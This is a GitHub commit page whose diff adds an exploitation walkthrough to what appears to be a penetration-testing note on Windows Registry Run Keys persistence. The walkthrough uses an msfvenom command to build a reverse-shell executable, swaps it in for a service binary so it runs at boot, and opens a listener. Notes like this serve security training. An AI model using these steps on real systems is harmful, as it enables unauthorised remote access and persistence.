Skip to content

Commit

Permalink
Edit Logon Autostart Execution (Registry Run Keys)
Browse files Browse the repository at this point in the history
  • Loading branch information
@nickvourd
nickvourd committed Dec 20, 2023
1 parent 9536a60 commit 93d010c
Show file tree
Hide file tree
Showing 2 changed files with 20 additions and 0 deletions.
20 changes: 20 additions & 0 deletions Notes/LogonAutostartExecutionRegistryRunKeys.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -99,6 +99,26 @@ Outcome:

## Exploitation

1) Use msfvenom to generate a malicious executable (exe) file that can be executed via the booting of the victim's machine:

```
msfvenom -p windows/x64/shell_reverse_tcp lhost=eth0 lport=1234 -f exe > shell.exe
```

2) Transfer the malicious executable file to victim's machine.

3) Move the malicious executable file to 'C:\Program Files\NickvourdSrv'.

4) Rename the 'NCV_AMD64.exe' to 'NCV_AMD64.bak'.

5) Rename the malicious exe (shell.exe) to 'NCV_AMD64.exe'.

Outcome:

![RegistryAutoruns-AboveActions](/Pictures/RegistryAutoruns-AboveActions.png)

6) Open a listener on your Kali machine.

## Mitigation

## References
Expand Down
Binary file added Pictures/RegistryAutoruns-AboveActions.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.

0 comments on commit 93d010c

Please sign in to comment.